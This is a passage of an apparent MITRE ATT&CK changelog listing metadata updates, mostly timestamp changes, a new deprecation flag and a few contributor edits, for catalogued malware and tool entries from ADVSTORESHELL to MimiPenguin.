values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:27.718000+00:002025-04-25 14:44:14.945000+00:00

[S0045] ADVSTORESHELL

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:45.086000+00:002025-04-25 14:45:09.488000+00:00

[S0092] Agent.btz

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:03.857000+00:002025-04-25 14:43:05.955000+00:00

[S0622] AppleSeed

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:59.641000+00:002025-04-25 14:42:53.967000+00:00

[S0129] AutoIt backdoor

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:43.395000+00:002025-04-25 14:45:05.203000+00:00

[S0640] Avaddon

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:10.078000+00:002025-04-25 14:43:26.180000+00:00

[S1053] AvosLocker

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:54.114000+00:002025-04-21 19:40:47.538000+00:00
x_mitre_contributors[0]Flavio Costa, CiscoFlávio Costa, @Segurança Descomplicada

[S0245] BADCALL

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:26.720000+00:002025-04-25 14:44:12.926000+00:00

[S0642] BADFLICK

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:09.558000+00:002025-04-25 14:43:25.093000+00:00

[S0128] BADNEWS

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:41.446000+00:002025-04-25 14:44:59.677000+00:00

[S0470] BBK

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:42.578000+00:002025-04-25 14:45:02.531000+00:00

[S0127] BBSRAT

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:13.507000+00:002025-04-25 14:43:36.304000+00:00

[S0360] BONDUPDATER

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:37.261000+00:002025-04-25 14:44:47.458000+00:00

[S0014] BS2005

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:14.043000+00:002025-04-25 14:43:38.100000+00:00

[S0043] BUBBLEWRAP

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:56.566000+00:002025-04-25 14:42:44.013000+00:00

[S0638] Babuk

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:12.880000+00:002025-04-25 14:43:34.138000+00:00

[S0337] BadPatch

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:25.897000+00:002025-04-25 14:44:11.108000+00:00

[S0234] Bandook

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:20.706000+00:002025-04-25 14:43:54.316000+00:00

[S0239] Bankshot

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:57.714000+00:002025-04-25 14:42:48.512000+00:00

[S0564] BlackMould

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:13.187000+00:002025-04-25 14:43:35.224000+00:00

[S0486] Bonadan

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:06.109000+00:002025-04-25 14:43:14.836000+00:00

[S0635] BoomBox

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:34.236000+00:002025-04-25 14:44:37.490000+00:00

[S0651] BoxCaon

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:23.138000+00:002025-04-25 14:44:03.536000+00:00

[S0482] Bundlore

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:18.925000+00:002025-04-25 14:43:50.199000+00:00

[S0025] CALENDAR

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:10.875000+00:002025-04-25 14:43:28.496000+00:00

[S0465] CARROTBALL

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:52.338000+00:002025-04-25 14:45:20.112000+00:00

[S0222] CCBkdr

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:30.519000+00:002025-04-25 14:44:25.199000+00:00

[S0119] Cachedump

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:56.154000+00:002025-04-25 14:45:28.653000+00:00

[S0454] Cadelspy

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:29.046000+00:002025-04-25 14:44:19.544000+00:00

[S0077] CallMe

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:35.526000+00:002025-04-25 14:44:42.237000+00:00

[S0351] Cannon

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:36.652000+00:002025-04-25 14:44:46.016000+00:00

[S0335] Carbon

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:31.987000+00:002025-04-25 14:44:30.048000+00:00

[S0572] Caterpillar WebShell

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:17.640000+00:002025-04-25 14:43:46.592000+00:00

[S0220] Chaos

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:11.037000+00:002025-04-25 14:43:29.227000+00:00

[S0674] CharmPower

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:18.570000+00:002025-04-25 14:43:49.304000+00:00

[S0107] Cherry Picker

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:30.864000+00:002025-04-25 14:44:26.291000+00:00

[S0660] Clambling

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:16.175000+00:002025-04-25 14:43:43.008000+00:00

[S0611] Clop

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:35.205000+00:002025-04-25 14:44:41.142000+00:00

[S0054] CloudDuke

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:35.863000+00:002025-04-25 14:44:42.958000+00:00

[S0338] Cobian RAT

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:29.365000+00:002025-04-25 14:44:21.097000+00:00

[S0369] CoinTicker

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:36.473000+00:002025-04-25 14:44:45.121000+00:00

[S0244] Comnie

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:43.241000+00:002025-04-25 14:45:04.669000+00:00

[S0050] CosmicDuke

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:00.812000+00:002025-04-25 14:42:57.253000+00:00

[S0538] Crutch

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:23.296000+00:002025-04-25 14:44:04.068000+00:00

[S0498] Cryptoistic

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:27.529000+00:002025-04-25 14:44:14.409000+00:00

[S0625] Cuba

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:15.861000+00:002025-04-25 14:43:42.282000+00:00

[S0616] DEATHRANSOM

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:16.017000+00:002025-04-25 14:43:42.648000+00:00

[S0334] DarkComet

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:08.057000+00:002025-04-25 14:43:20.605000+00:00

[S1111] DarkGate

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2024-09-29 10:22:45.776000+00:002025-04-22 22:18:48.564000+00:00
x_mitre_contributors[1]Phyo Paing Htun (ChiLai)Phyo Paing Htun (ChiLai), I-Secure Co.,Ltd

[S0187] Daserf

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:31.680000+00:002025-04-25 14:44:29.509000+00:00

[S0243] DealersChoice

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:22.471000+00:002025-04-25 14:44:02.087000+00:00

[S0200] Dipsind

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:39.512000+00:002025-04-25 14:44:54.842000+00:00

[S0600] Doki

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:06.758000+00:002025-04-25 14:43:17.148000+00:00

[S0186] DownPaper

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:40.332000+00:002025-04-25 14:44:56.608000+00:00

[S0134] Downdelph

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:53.960000+00:002025-04-25 14:42:36.848000+00:00

[S0547] DropBook

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:03.046000+00:002025-04-25 14:43:03.619000+00:00

[S0502] Drovorub

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:25.508000+00:002025-04-25 14:44:09.839000+00:00

[S0062] DustySky

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:14.194000+00:002025-04-25 14:43:38.466000+00:00

[S0024] Dyre

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:13.036000+00:002025-04-25 14:43:34.862000+00:00

[S0593] ECCENTRICBANDWAGON

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:41.289000+00:002025-04-25 14:44:59.309000+00:00

[S0624] Ecipekac

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:59.458000+00:002025-04-25 14:42:53.604000+00:00

[S0554] Egregor

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:36.019000+00:002025-04-25 14:44:43.318000+00:00

[S0091] Epic

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:15.497000+00:002025-04-25 14:43:41.197000+00:00

[S0361] Expand

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:56.328000+00:002025-04-25 14:45:29.018000+00:00

[S0569] Explosive

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:15.035000+00:002025-04-25 14:43:40.097000+00:00

[S0181] FALLCHILL

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:45.711000+00:002025-04-25 14:45:10.924000+00:00

[S0173] FLIPSIDE

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:55.971000+00:002025-04-25 14:42:42.171000+00:00

[S0628] FYAnti

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:04.305000+00:002025-04-25 14:43:07.972000+00:00

[S0076] FakeM

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:32.986000+00:002025-04-25 14:44:33.289000+00:00

[S0512] FatDuke

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:08.387000+00:002025-04-25 14:43:21.871000+00:00

[S0171] Felismus

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:57.048000+00:002025-04-25 14:42:46.344000+00:00

[S0679] Ferocious

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:17.322000+00:002025-04-25 14:43:45.868000+00:00

[S0120] Fgdump

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:51.728000+00:002025-04-25 14:45:18.484000+00:00

[S0355] Final1stspy

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:28.188000+00:002025-04-25 14:44:16.040000+00:00

[S0696] Flagpro

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2024-09-04 21:39:21.144000+00:002025-04-25 19:04:04.232000+00:00
x_mitre_contributors[0]Hannah Simes, BT SecurityHannah S

[S0193] Forfiles

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:54.018000+00:002025-04-25 14:45:23.318000+00:00

[S0503] FrameworkPOS

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:57.360000+00:002025-04-25 14:42:47.607000+00:00

[S0417] GRIFFON

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:52.695000+00:002025-04-25 14:42:33.402000+00:00

[S0049] GeminiDuke

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:57.198000+00:002025-04-25 14:42:46.881000+00:00

[S0460] Get2

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:54.423000+00:002025-04-25 14:42:37.942000+00:00

[S0561] GuLoader

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:04.665000+00:002025-04-25 14:43:09.227000+00:00

[S0132] H1N1

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:44.456000+00:002025-04-25 14:45:07.358000+00:00

[S0151] HALFBAKED

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:55.633000+00:002025-04-25 14:42:41.277000+00:00

[S0246] HARDRAIN

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:33.134000+00:002025-04-25 14:44:34.161000+00:00

[S0617] HELLOKITTY

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:11.555000+00:002025-04-25 14:43:30.306000+00:00

[S0070] HTTPBrowser

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:39.195000+00:002025-04-25 14:44:53.772000+00:00

[S0047] Hacking Team UEFI Rootkit

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:05.792000+00:002025-04-25 14:43:13.563000+00:00

[S0499] Hancitor

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:42.270000+00:002025-04-25 14:45:01.455000+00:00

[S0224] Havij

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:57.107000+00:002025-04-25 14:45:31.679000+00:00

[S0537] HyperStack

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:00.476000+00:002025-04-25 14:42:55.977000+00:00

[S0189] ISMInjector

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:11.226000+00:002025-04-25 14:43:29.589000+00:00

[S0483] IcedID

Current version: 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2024-10-28 19:20:20.633000+00:002025-04-22 22:16:09.049000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsMatt Brenton, Zurich Global Information Security
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_contributorsMatt Brenton

[S0259] InnaputRAT

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:34.903000+00:002025-04-25 14:44:39.436000+00:00

[S0260] InvisiMole

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:05.140000+00:002025-04-25 14:43:10.665000+00:00

[S0389] JCry

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:29.735000+00:002025-04-25 14:44:21.898000+00:00

[S0201] JPIN

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:38.557000+00:002025-04-25 14:44:51.758000+00:00

[S0648] JSS Loader

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:43.545000+00:002025-04-25 14:45:05.560000+00:00

[S0528] Javali

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:13.353000+00:002025-04-25 14:43:35.588000+00:00

[S0271] KEYMARBLE

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:56.418000+00:002025-04-25 14:42:43.623000+00:00

[S0156] KOMPROGO

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:19.228000+00:002025-04-25 14:43:51.104000+00:00

[S0088] Kasidet

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:58.992000+00:002025-04-25 14:42:52.151000+00:00

[S0265] Kazuar

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:07.739000+00:002025-04-25 14:43:19.859000+00:00

[S0585] Kerrdown

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:21.498000+00:002025-04-25 14:43:59.023000+00:00

[S0599] Kinsing

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:37.411000+00:002025-04-25 14:44:48.521000+00:00

[S0437] Kivars

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:31.015000+00:002025-04-25 14:44:27.009000+00:00

[S0641] Kobalos

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:25.723000+00:002025-04-25 14:44:10.741000+00:00

[S0162] Komplex

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:42.776000+00:002025-04-25 14:45:02.893000+00:00

[S0042] LOWBALL

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:59.992000+00:002025-04-25 14:42:54.704000+00:00

[S0362] Linux Rabbit

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:56.120000+00:002025-04-25 14:42:42.534000+00:00

[S0513] LiteDuke

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:24.381000+00:002025-04-25 14:44:07.137000+00:00

[S0397] LoJax

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:32.158000+00:002025-04-25 14:44:30.421000+00:00

[S0447] Lokibot

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:35.363000+00:002025-04-25 14:44:41.863000+00:00

[S0582] LookBack

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:35.052000+00:002025-04-25 14:44:40.541000+00:00

[S0121] Lslsass

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:50.784000+00:002025-04-25 14:45:15.980000+00:00

[S0532] Lucifer

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:08.548000+00:002025-04-25 14:43:22.226000+00:00

[S0010] Lurid

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:58.843000+00:002025-04-25 14:42:51.586000+00:00

[S0443] MESSAGETAP

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:26.051000+00:002025-04-25 14:44:11.465000+00:00

[S0233] MURKYTOP

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:52.514000+00:002025-04-25 14:42:32.856000+00:00

[S0282] MacSpy

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:44.003000+00:002025-04-25 14:45:06.639000+00:00

[S0652] MarkiRAT

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:07.387000+00:002025-04-25 14:43:19.128000+00:00

[S0449] Maze

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:37.773000+00:002025-04-25 14:44:49.604000+00:00

[S0459] MechaFlounder

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:38.886000+00:002025-04-25 14:44:52.837000+00:00

[S0179] MimiPenguin

Current version: 1.2

Details
dictionary_item_added
